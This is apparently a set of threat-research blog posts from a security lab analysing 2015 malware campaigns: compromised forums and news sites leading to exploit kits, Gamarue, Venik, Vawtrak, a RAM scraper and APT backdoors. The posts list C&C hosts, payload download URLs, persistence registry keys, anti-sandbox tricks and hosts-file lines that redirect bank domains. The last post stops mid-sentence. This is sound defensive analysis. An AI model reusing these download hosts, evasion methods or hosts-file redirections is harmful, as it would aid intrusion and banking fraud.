Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites.  They are powered by outdated software so the vulnerability was likely used to compromise them, injecting the malware redirection code. The injection redirects to an exploit kit that downloads encrypted Gamarue malware that is sandbox-aware (does not execute in virtual environments).  As of Apr 8, 2015 the campaign is still ongoing. We analyzed one of the infection chains below, which happens to have minimal detection on Virus Total.

On April 6, 2015 Diychatroom.com was redirecting users to Fiesta Exploit Kit. It delivers a multi-stage binary payload that involves several malware families.  

 The affected websites include:

• www.Diychatroom.com
• www.dogforums.com
• www.e-cigarette-forum.com
• www.excelforum.com
• www.goldenretrieverforum.com
• www.horseforum.com
• www.loverslab.com
• www.ps3news.com
• www.scubaboard.com
• www.visajourney.com
• www.wranglerforum.com
• www.wrestlingforum.com
• and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums by using a big number of generic domain names they acquired over the past decade. VerticalScope has over 400 websites with combined reach of more than 80 Million unique visitors per month.

 Diychatroom.com Infection

The infection chain is as follows:

This EK is heavily obfuscated but after several layers of deobfuscation, it clearly reveals what it tries to do. It exploits the following vulnerabilities: 

• CVE-2013-2551 (IE)
• CVE-2015-0313 (Flash)

                                                            _{CVE-2013-2551}    

               _{First layer of flash using LoadBytes() to load second layer}

                     _{Second layer flash. CVE-2015-0313}

 Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

Payload

The payload arrives encrypted over the network. This is a multi-stage malware that involves two files  obtained from its resource  and one file downloaded. 

• 77f22bfc9cf7e46c6e738d8b68ad19f6   – Main Dropper
• c091894cd23d49a14d5cabf0d60c379c  – Gamarue
• 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
• 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

Main Dropper

The main dropper is armored and will not executed in a virtual environment. 

Armoring:

• anti-virtualbox
• anti-qemu
• anti-vmware

It checks the presence of string VBOX, QEMU and VMWARE from the return of SetupDiGetDeviceRegistryPropertyW.

Under non-virtual system, it drops 2 files obtained from its resource in the %TEMP% folder and execute it via CreateProcess or ShellExecute.

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new process of msiexec.exe and injects code into it. It drops a copy of itself in %ALLUSERPROFILE% using random filename, e.g., “mssffnmc.exe”. 

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

Value: {random}

Data : %ALLUSERPROFILE%\{copy of itself}

Disables some Windows security settings by changing the value of the following registry entries:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Value: “EnableLUA“

Data: “0“

 

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Value: “TaskbarNoNotification“

Data: “1“

Value: “HideSCAHealth“

Data: “1“

 

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Value: “Hidden”

Data: “2″

It connects to its CnC server, nindziaboy.net to send data and receive commands. Communication to the server is encrypted and depending on the reply, it can perform the following commands:

• Report 
• Update
• Start

It also performs DNS request to the following domains:

• africa.pool.ntp.org
• oceania.pool.ntp.org
• asia.pool.ntp.org
• south-america.pool.ntp.org
• north-america.pool.ntp.org
• europe.pool.ntp.org

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

This malware’s main purpose is to open several hidden IE instance that access websites. 

Similar to the main dropper, it exits and do nothing if it detects it is running under virtual environment.

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then it creates a service for itself with name as “SystemUpdate”.

It injects to either, iexplore.exe, chrome.exe, firefox,exe, explorer.exe to gain elevated privilege and tries stop the following services:

• SharedAccess
• wscsvc
• MpsSvc
• WinDefend
• wuauserv
• BITS
• ERSvc
• WerSvc

It creates five threads that fire a hidden Internet Explorer Browser that visits the following URLs:

• http://videosearcher{.}org/4ff9ae/9126
• http://truesearchresults{.}com/?aff=7733&saff=9126

 _{Created several hidden IE that visits a url}

Afterwards, the following network connections were observed:

^{GET /analytics.js HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: www.google-analytics.com}

^{Connection: Keep-Alive}

^{GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: counter.yadro.ru}

^{Connection: Keep-Alive}

Additional details:

Creates mutex with the following name:

•  _HSJ909NJJNJ90203_

Connects to the following urls to get geolocation of the victim’s machine.

• www.telize.com/geoip

 If it detects that it is running on a 64-bit system, it will load its 64-bit counterpart that is found in its resource.

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

This file is downloaded from the following link:

• http://clenodium{.}eu/tmp/file{.}exe

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random.exe}

It creates a new process of wuauclt.exe and injects into it.  It contacts the following CnC server and wait for commands:

• dobavki-shop.com

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: dobavki-shop.com

Connection: Keep-Alive

 

Apparently from the above CnC request, it sends system information in clear text, including:

• MachineGuid
• OS version
• Display device (monitor) name

It waits for the following commands from the server.

• #none – do nothing
• #stop
• #update – update self
• #update_miner
• #opencl
• #destruct – kill self
• #error
• #download  – Download files

The server evaluates the information received from the infected computers and replies back with any one of the above listed commands. When the trojan is executed in a virtual environment (or sandbox) it chooses to stay low and replies with command #none.

 Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are also infected with this same malicious attack.  These forum sites are powered by vBulletin  or by IP Board.

Early this year, Sucuri blog reported a serious vulnerabilty affecting vBSEO that allows an attacker to remotely execute malicious PHP code on your website. vBSEO is a component of vBulletin but it was already discontinued due to several vulnerabilities. The sad fact is that some websites still use it. 

For website administrators affected by this attack, Sucuri posted the following options:

1. Completely remove vBSEO from your site – It is not supported anymore
2. Apply the patch recommended by the vBulletin team
3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

 For visitors of forum sites, ensure that you are running the latest version of browsers and flash as this attack involves IE and flash exploits.

Connecting Dots

For the curious threat researchers out there, you may wonder why the armored malware completely avoided all three popular virtualization environments (VirtualBox, Qemu, and Vmware), not even Vmware which is a fairly popular platform adopted by many businesses?  Indeed Cyphort Labs have seen malware samples which singled out VirtualBox and Qemu for evasion, but was happy to play inside Vmware.  In those cases, the objective of armoring design seems to be anti-analysis or anti-sandboxing.  As we have mentioned earlier, this malware campaign has targeted over a hundred forums which seem to be serving mostly individual home users. As we saw from the attack payload (TrojanClicker.FleerCivet) earlier, it is part of a click fraud campaign.  For a click fraud to look legitimate, it better come from home users, so how many home users’ machines would actually run VirtualBox, Qemu, or Vmware?  Very few.  So we believe that this malware pack is designed for click fraud campaign and for distribution using watering hole attacks.  The armoring against all the virtualization environments is done to avoid detection by anti-click-fraud systems.

 Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company name anonymous. The source said, initial entry of the attack is a spear phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware exhibits anti-sandbox properties and includes protection against heuristic signatures commonly used by anti virus companies. The various malware samples also show a common theme, like installing themselves in the %ProgramFiles% or in the %UserProfile% folder depending on whether the user has admin privileges or not. Additionally, the majority of the malware samples are compiled with Borland Delphi with their strings encrypted and API strings either obfuscated or divided into several strings as protection against heuristic signatures. None of the samples are packed except for one.

Based on the file creation date of the files, it appears the attack started as early as January 2015 and lasted for three months. 

Summary of samples used in this attack

Technical Analysis

GoogleUpdate.exe

The file structure of the file is not common as we see on prevalent malware today. Why? because most AV products today employ heuristic based detection that detects packed samples and samples with an uncommon file structure. This malware is not packed and sections resemble a normal file.

Strings are encrypted and will only be decrypted right before use.  The malware also divides its APIs into several strings. This is also to avoid heuristic signatures that detect strings and suspicious APIs.

It drops a copy of itself in %Pr0gramFiles% folder if user is admin and %UserProfile% folder if not

If admin:

• %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

• %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with a service name of “SENSS”.  

After checking that it is successfully running as a service, it checks if the parent process is explorer.exe or iexplore.exe . If so, it will load its dll file from its data section. This dll is encrypted via XOR with 0x89 as key. Otherwise, it will enumerate processes and find services.exe and injects its dll.

Anti-Sandbox

Detects Sleep Acceleration

To defeat a sandbox, this malware delays execution  through sleeps or loops because it knows a sandbox system will execute the the malware for a short limited amount of time. By contrast, once inside your system, the malware has the luxury of time to perpetrate its malicious intent. To defeat this, sandbox systems employ acceleration, that is if they detect that a sample uses a delay, it will accelerate it. For example, if it detects the sample sleeps for 1 minute it will change it to sleep for 1 second. Unfortunately, for this malware, this technique will not work. It is able to detect sleep acceleration by issuing a sleep and gets the time elapsed after that and checks if the  time elapsed is lower than the time of sleep.

Detects API hooks

Sandbox systems also hooks APIs to tell the behavior of a file. This malware detects hooks by checking if the first instruction of a certain API is a jmp, call or a push-retn. It checks if the start byte of an API address is either of the following bytes:

• E8
• E9
• EB
• FF
• 68????????C3 (push retn)

Payload

The injected code is a backdoor that communicates to the following C&C servers:

• bbs.gokickes.com:80
• img.lifesolves.com:8080
• domain.gokickes.com:443

Depending on backdoor commands, this malware is capable of the following

• Download and execute additional files 

• Capture Screenshots
• Capture Mouse and keyboard events

• Update itself
• Opens remote shell
• Terminate Process
• Enumerate Network Shares
• Enumerate Drives
• Uninstall itself

Lastly, all data sent and received from server is encrypted with XOR key 0xD5

mslives.exe

This sample has similar file structure as GoogleUpdate.exe but it doesn’t employ similar anti-sandbox tricks.

When first ran, it sleeps for 300 seconds before doing its installation routine.  Afterwards, it creates a copy of itself as follows:

• %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy however as written with large garbage of data at the end of the file that balloons its file size to more than 100MB. It writes to this file 100KB of data 1000 times. There are two things this behavior tries to evade sandbox. First,  this malware however does not create a copy of itself technically which makes this malware’s behavior unusual and may appear to sandbox as benign behavior. The usual malware behavior is to create an exact copy of itself. Second, the multiple writing event might exceed the sandbox limit and the file size of the dropped copy will make it unsuspecting for the sandbox.

It executes its dropped copy using CreateProcess then checks if it is running as iexplore.exe, if not, it will create a suspended process of iexplore.exe and injects its code into it by overwriting to iexplore.exe’s main module.

It creates a hidden windows with window name and class name “111111”. 

It then creates an autostart registry entry below to let it run at every startup.

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Valuue: msliveupdate
  • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

Payload

This sample has only one purpose and that is to download and execute a file downloaded from forum.energymice.com.

_{GET /view/login.asp HTTP/1.1}

_{Content-Type: */*}

_{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)}

_{Host: forum.energymice.com}

_{Cache-Control: no-cache}

It downloads the file in the %TEMP% folder and executes it. Unfortunately, at the time of our analysis, the download URL is not returning any binary.

winhost.exe

Unlike the other files this one is clearly packed. PEiD identifies the packer as follows:

• ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR” as we found this string in its body. We also found other interesting strings which indicates the protector used.

• HDoor, Version 1.0
• Copyright (C) 2013
• (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

This is a backdoor  that listens to port 143 and waits for the client to connect and issue commands. Port 143 is the default IMAP non-encrypted port. IMAP or (Internet Message Access Protocol)  is a mail protocol used for accessing email on a remote web server from a local client.

It checks if the user is admin or not.  If the user is admin, it will install itself as a service and drops a copy in the following directory:

• %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not admin, it will install itself as follows and creates an autostart key entry in the registry.

• %USERPROFILE%\System\winhost.exe

Autostart Registry Entry:

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: Microsoft Messenger
  • Data: %USERPROFILE%\System\winhost.exe

Payload

It is capable of performing the following depending on the attacker’s command.

• Disconnect
• Get backdoor install path
• List directory or files
• Type a txt file content
• Execute A Program
• Download A File
• Get A CMD Shell
• Exit CMD Shell
• Upload a file
• Download a file
• Load dll library
• Free dll library

nethost.exe

Install a copy of itself as follows depending if the user is admin or not:

If user is admin:

• %ProgramFiles% \common files\system\library\nethost.exe

Installs itself as a service:

• HKLM\System\CurrentControlSet\Services\ncoglsse
  • DisplayName = Microsoft Wireless Device Service
  • ImagePath = %ProgramFiles% \common files\system\library\nethost.exe

If not admin:

• %USERPROFILE% \system\library\nethost.exe

It creates the following autostart key

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: “ncoglsse”
  • Data: %ProgramFiles%\common files\system\library\nethost.exe

After installation, it will inject to lsass.exe to stay memory resident and execute its payload.

Payload

It downloads from the following URLs

• http://hud321.astringer.com/images/log.gif
• http://grop.waterglue.org/images/logg.gif
• http://hud.astringer.com/images/log.gif

The content of the downloaded files are encrypted URLS that it uses to connect to its C&C. The malware connects to this URL using HTTP POST and sends the following information.

• IP address
• Language ID
• Malware version
• OS version
• Machine name

It receives commands from the C&C and it is capable of the following:

• Collect information about the drives and folders on your PC
• List Files

• Download files
• Terminate Processes
• Open CMD shell

Shell64.dll  

Shell64_u.dll – Loader Component

The loader component runs as a service, loading the espionage component and makes sure the infection keeps intact. The service, including the service name, is to be configured by the malware dropper, which is not known at the time of writing. Strings embedded in the loader component suggest the binary is packed with the Dyamar binary protector, but the binary does not leave the impression of being thoroughly protected.

Simple obfuscation elements, induced by macros and a number of obfuscated strings show attempts of complicating the analysis but are easily bypassed. Also the binary comes with three dummy exports, which show more of the obfuscation elements. Interestingly, the binary keeps a log file, located under C:\debug.txt, where debug messages are written to. This is rather uncommon for binaries found in the wild.

The ServiceMain method will direct execution to one of the exports, either ‘LoadFunc’ for Windows OS versions below 6.0, or to ‘win7load’ for 6.0 and above. Said exports load the espionage component, running it via a spawned rundll32.exe process with the according parameters set. This second stage binary exports two functions, ‘main’ and ‘lowmain’, which are again suited for OS versions below and above 6.0.

Shell64.dll – Espionage Component

The espionage component comes with the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above, while lowmain serves versions below 6.0. Just like the loader component this binary creates and maintains the file C:\debug.txt where debugging information is written to.

During startup shell64.dll creates a named mutext, dubbing it ‘Global\\KongQi [TickCount]’, where TickCount is the actual time stamp at the time of infection. Also the malware creates a named view which is used to exchange runtime information among threads and intruded processes, dubbed ‘_kaspersky’. The name is doubtlessly chosen to add stealth.

During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

• Hostname
• System CPU power
• OS version
• Drive geometry for PHYSICALDRIVE0
• Global memory status
• Video capture driver description
• Installed security products based on running processes list

Security Product Enumeration

The list of products to be searched for is long:

The following firewall installations will also be enumerated:

• Norton Personal Firewall        
• ZoneAlarm                       
• Comodo Firewall                 
• eTrust EZ Firewall              
• F-Secure Internet Security      
• McAfee Personal Firewall        
• Outpost Personal Firewall       
• Panda Internet Seciruty Suite   
• Panda Anti-Virus/Firewall       
• BitDefnder/Bull Guard Antivirus
• Rising Firewall                 
• 360Safe AntiArp

Espionage Capabilities

Once the malware is all set up and running it waits for instructions from the remote servers. Its capabilities are plenty, and are all designed to steal data from the infected system. Spied information is compressed with the deflate algorithm and sent to a remote server. A list of analyzed functions is as follows:

• Video Captures using a capture window named CVideoCap while compressing the video using the Windows VCM API (Video Compression Manager)
• Sound captures from the system’s sound input device, i.e. microphone
• Stealing data from the current desktop’s clipboard, which can yield passwords from password managers
• Capture screenshots and compress them, exfiltrate as a stream
• The sample includes a userland keylogger, setting a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’, created within the Windows system directory
• Clear event logs for ‘Application’, ‘Security’ and ‘System’, which is usually done to erase forensic evidence of an intrusion
• Shut the system down, which eventually forces a reboot
• Create a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
• Download files and execute them
• Execute other binaries from disk
• Enumerate files and file attributes on the system, modify and deletie files and directories
• Enumerate window names of opened applications
• Enumerate system attributes like OS version, CPU power or memory capacities of the disk, system up time, number of processors, names of running processes while matching for security products, computer name, user name of current user, attached drives

• Enumerating parameters for dial-up connections, such as phone number and device name
• Enable terminal services and allow remote connections
• Pop message boxes
• Open a socket for sending and receiving data
• Delete its files and persistence mechanisms from the machine, i.e. uninstall the service and remove an auto-run registry key located under [HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’; it is unclear though, how this key is created in the first place

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the according dropper. The service name remains unclear, as it is also set by the dropper. However, the malware comes with the capability to inject its payload to remote processes and contains a function to inject to winlogon.exe (in Windows versions prior to 6.0).

dllhost.exe

This malware does not do much. It only tries to download from blog.softfix.co.kr:80.

Who’s behind?

The attacker used C&C servers that are registered in Korea with registration records looking fake. Some of the C&C servers are also owned by hugedomains.com which is a company that sells previously owned domains and have a service that hides the information. We also noticed that based on the strings in the binary, it’s clear that it does not come from native English speaker.

Whois Records of C&C used

Malware doesn’t need to be advanced to be effective

These malwares are not advanced and they are also the family of malware we have seen before yet they were able to infiltrate and bypass security. The malware were able to reside unnoticed for three months which gives the attacker plenty of time to operate. This proves that malware doesn’t need to be advanced or sophisticated to be able to get through.  

AV is still our best defense, they block majority of security events, it’s just that there are too many malware attacks with various techniques that there is no single security security solution that will stop all these attacks. That is why we need multiple security solutions and we need security people in our respective organizations.

Why spear phish?

The initial entry of the malware is a spear phishing email that targets one of the head of the company.  According to a report from TrendMicro, spear-phishing is still the most favored APT attack bait. They said that “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails. “

It is easy for the attacker to guess email address of people  in organization especially if they are high-ranking officials as their names are available online. The attackers can easily profile them by searching any available info online. This makes the attacker customize their attack according to the profile of the target.

As proven, attackers usually target the weakest point and more often, the weakest point is the people in our organization. This is a message that to protect our organization, we must also educate and train all the people within our organization for proper security practices so as not to fall with these types of social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack. 

On September 18, 2015, we saw an activity on koreatimes.com where we captured a malicious binary. We investigated further and found that this campaign is specifically targeted to Korean sites and Korean banks. 

We looked at our logs for this year and found more Korean websites infected:

• koreatimes.com (Sep. 18, 2015)
• filehon.com(May 30, 2015)
• joara.com (May 3, 2015)
• hometax.go.kr (May 3, 2015)
• soriaudio.co.kr (April 23, 2015)
• gomsee.com (March 16, 2015)
• lottoplay.co.kr (Feb 6, 2015)
• insight.co.kr (Jan 31, 2015)
• filecity.co.kr (Jan 23, 2015)
• nggol.com(Jan 6, 2015)
• koreamanse.com(Jan 6, 2015)

The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server. This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site. It also targets Ahnlab by killing processes and deleting files specific to the software. Ahnlab is a popular antivirus software in South Korea.

                                                              Infection Flow

Website Infection

This following analysis will focus on the infection that took place in koreatimes.com

The culprit is a javascript file named “2013_gnb.js” which is an iframe injector leading to KaiXin EK landing page.

It exploits the following vulnerabilities:

• CVE-2014-6332 (IE)
• CVE-2011-3544 (Java)
• CVE-2015-0336 (flash)

We found interesting strings on the flash file which gives us an idea about the attackers platform on building its exploit and references to the attacker. Also an interesting string “King Lich V” was found on the flash file which  is likely the author’s signature. That string was found also found in other attacks involving Chinese group. Flash file was also packed using DoSWF.

Once the exploitation is successful, it has two options to execute its payload.  If it is running in Windows 7 or 8, it will fire a powershell script that will download an executable file from 199[.]188[.]106[.]161.

Else, it executes a shellcode that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former was basically used to bypass DEP

The binary downloaded is a banking malware with backdoor capabilities under the family of Venik.

Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The binary downloaded is actually dropper which when executed installs a dll file in C:\{random} folder using random name like “c:\tqcsv\krxxc.rxk”. It executes this dll as:

• “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start

Creates mutex (M142.0.137.66:3201) and creates autostart key entry such as:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons out to its server by contacting the following urls:

• http://142[.]0[.]137[.]68:803
• http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to 142.0.137.66 using TCP port  3201 and waits for a command from the server. The server can issue a command that starts a remote access service from the infected client.

It also collects files from %ProgramFiles% folder and mapped drives. It copies the files to a random file in C:\ using xcopy  and uploads the file to its server using an HTTP session.

It modifies the hosts file (%system32%\drivers\etc\hosts) and adds the following lines. It effectively redirects the users visit of banking sites to a site controlled by the attacker which is actually a phishing site:

142.0.137.199 www.shinhan.com.or
142.0.137.199 search.daum.net
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.knbank.vo.kr
142.0.137.199 openbank.cu.vo.kr
142.0.137.199 www.busanbank.vo.kr
142.0.137.199 www.nonghyup.com.or
142.0.137.199 www.shinhan.ccm
142.0.137.199 www.wooribank.com.or
142.0.137.199 www.hanabank.ccm
142.0.137.199 www.epostbank.go.kr.or
142.0.137.199 www.ibk.co.kr.or
142.0.137.199 www.ibk.vo.kr
142.0.137.199 www.keb.co.kr.or
142.0.137.199 www.kfcc.co.kr.or
142.0.137.199 www.lottirich.co.ir
142.0.137.199 www.nlotto.co.ir
142.0.137.199 www.gmarket.net
142.0.137.199 nate.com
142.0.137.199 www.nate.com
142.0.137.199 daum.com
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.zum.com
142.0.137.199 zum.com
142.0.137.199 naver.com
142.0.137.199 www.nonghyup.com
142.0.137.199 www.naver.com
142.0.137.199
142.0.137.199 www.nate.net
142.0.137.199 hanmail.net
142.0.137.199 www.hanmail.net
142.0.137.199 www.hanacbs.com
142.0.137.199 www.kfcc.co.kr
142.0.137.199 www.kfcc.vo.kr
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.kbstir.com
142.0.137.199 www.nonghuyp.com
142.0.137.199 www.shinhon.com
142.0.137.199 www.wooribank.com
142.0.137.199 www.ibk.co.kr
142.0.137.199 www.epostbenk.go.kr
142.0.137.199 www.keb.co.kr
142.0.137.199 www.citibank.co.kr.or
142.0.137.199 www.citibank.vo.kr
142.0.137.199 www.standardchartered.co.kr.or
142.0.137.199 www.standardchartered.vo.kr
142.0.137.199 www.suhyup-bank.com.or
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.kjbank.com.or
142.0.137.199 www.kjbank.com
142.0.137.199 openbank.cu.co.kr.or
142.0.137.199 openbank.cu.co.kr
142.0.137.199 www.knbank.co.kr.or
142.0.137.199 www.knbank.co.kr
142.0.137.199 www.busanbank.co.kr.or
142.0.137.199 www.busanbank.co.ir
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.suhyup-bank.ccm
142.0.137.199 www.standardchartered.co.kr

                               Host File Modification

The phishing site asks for sensitive information that are not usually ask during a normal online banking session. 

There are also times that it will ask the user to visit other banking sites leading to phishing sites. This happens when it is likely that the phishing site does not currently support a bank.

Adding to its attack on Korean related services, it tries to disable Ahnlab related files and process. Ahnlab is a popular antivirus software in South Korea.

As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

Credits to Alex Burt for his help in discovery of this  infection.

 On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com has been compromised and is currently infecting visitors via drive-by-download malwares. We immediately contacted psychcentral about this infection as early as we have discovered it. As of October 29, their technical team identified the problem and addressed the issue. Psychcentral[.]com is a leading independent metal health social network. It receives about 163,846 unique visitors per day.

The site was infected with an iframe injector that redirects to  Angler EK. It uses a flash exploit that targets the recent vulnerability in Adobe flash. We found it to be installing bedep and vawtrak. Bedep was known to be the notorious ad fraud malware and vawtrak is a banking trojan following the success of Zeus. We have seen Angler to be using bedep as its payload  but adding vawtrak in its arsenal is something we haven’t seen in the past until recently. Moroever, the vawtrak sample we got downloads a new memory scraping malware that scans for credit card data in memory. This is typical of Point Of Sale malware like the ones that affected Target stores.

Infection Chain

The iframe injection originates from an Ad server script that is using Open AdStream (OAS).
The script makes a request to oascentral[.]spineuniverse[.]com which leads to a function OAS_RICH() responsible for injecting iframes on the web page.

Ad server script injecting iframe

The webpage finally leads to Angler EK landing page on margueriteyellow[.]bitcoininvesting[.]net. It uses a flash exploit that targets the following vulnerability:

• CVE-2015-5560, Adobe Flash Player versions prior to 18.0.0.232 on Windows and OS X.

The said vulnerability was already patched on 18.0.0.232 flash update.

network activity during infection

Payloads

We were able to obtain 3 executable payloads from this infection:

• a2ee0c22d0cbdaa1c8de45c4a487b96a – Bedep
• 28639b2c93a24ed6d178f3098ca23f2e – Vawtrak
• a1d1ba04f3cb2cc6372b5986fadb1b9f – POS malware

Bedep

As we have seen in the past, bedep’s  function is to execute Ad fraud campaigns. It usually arrives encrypted over the network to protect itself against traditional IDS/IPS solutions. It resides in the system as a dll file, usually in %PROGRAMDATA% folder. It also creates a folder using the machine GUID and drops itself there.

Vawtrak

Vawtrak (aka Neverquest) is a rising star in the field of financial trojans. It was first discovered in-the-wild in 2013. It arrives using several methods, usually via exploit kits, or as an attachment to spam email, or downloaded by macro malware embedded in Microsoft Office documents and spreadsheets.

It employs similar functions used by Zeus, like using webinjects to collect confidential  banking information and hooking APIs to intercept browser traffic. It also downloads an encrypted configuration which contains URLs it targets to inject.

It also contains a list of download URLs that points to its additional modules. The sample we obtained has the following download links in its config:

Vawtrak Config file snapshot

Samples downloaded from 176[.]99[.]11[.]154 are its additional modules. One interesting url is http://46[.]30[.]41[.]16/files/970.exe which is a downloader of a new RAM-scraping malware akin to the ones used in typical POS malware as described in a Cyphort Special Report.

Vawtrak resides in the system as a dll file in the %PROGRAMDATA% using random names such as:

• C:\ProgramData\Nuxbu\Zuzhot.dll

It creates a run key using regsvr32.exe to execute the DLL. e.g.,

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value:{FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}
  • Data:regsvr32.exe “C:\ProgramData\Nuxbu\Zuzhot.dll”

It downloads its configuration file from:

• http://ninthclub.com/Work/new/index.php

RAM scraping malware

Vawtrak downloads and execute  “970.exe ” which then downloads a dll component from from 91.234.34.44 via TCP port 30970. It saves this as follows:

• %ALLUSERS%\Application Data\{random}.dll

It then downloads additional file via HTTP Get from:

• 50.7.143.61/a_p/a_970.exe

And saves it as:

• %ALLUSERS%\Application Data\taskhost.exe

taskhost.exe scans for every running process and check the memory for credit card information. If it finds such a process, it creates a new thread that checks for track 1 and track 2 data:

process enumeration to scrape credit card data

It specifically checks for credit cards that starts with 3, 4, 5, or 6 which means cards like AMEX, Visa, MasterCard, Diners Club, Discover, etc.

track 1 and track 2 checking

We see in this infection how cybercriminals use multiple infection methods. Exploit kits are usually packaged to target multiple software with vulnerabilities to increase their coverage. We have reports how angler generates $34 Million annually from ransomware alone. We see in this infection that the group is after the money. We are not sure how much money are they raking in. Bedep and Vawtrak targets consumers while the RAM scrapping malware targets POS systems. One thing is for sure, the group behind this are looking to cash in.

Special thanks to Alex Burt and the rest of Cyphort Labs for their help in discovering and analyzing this infection.

A new ransomware called Radamant has been discovered in early December 2015. On December 31, we found compromised websites redirecting to Rig Exploit Kit and downloading this ransomware. The following sites have been infected:

